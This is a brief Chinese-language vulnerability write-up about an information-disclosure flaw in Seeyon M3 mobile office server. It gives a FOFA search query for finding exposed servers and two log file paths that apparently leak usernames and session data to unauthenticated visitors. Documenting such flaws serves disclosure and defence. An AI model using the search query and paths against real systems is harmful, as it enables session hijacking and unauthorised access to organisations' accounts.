0x01 产品简介

M3移动办公是致远互联打造的一站式智能工作平台，提供全方位的企业移动业务管理，致力于构建以人为中心的智能化移动应用场景，促进人员工作积极性和创造力，提升企业效率和效能，是为企业量身定制的移动智慧协同平台。

0x02 漏洞概述

致远M3 server多个日志文件存在敏感信息泄露漏洞，允许未经身份验证的远程攻击者访问日志文件，泄露了登陆用户名及session等敏感信息，使系统处于极不安全的状态。

0x03 复现环境

FOFA：title="M3-Server"

0x04 漏洞复现

泄露点-1

/mobile_portal/logs/autoLogin.log

泄露点-2

/mobile_portal/logs/app.log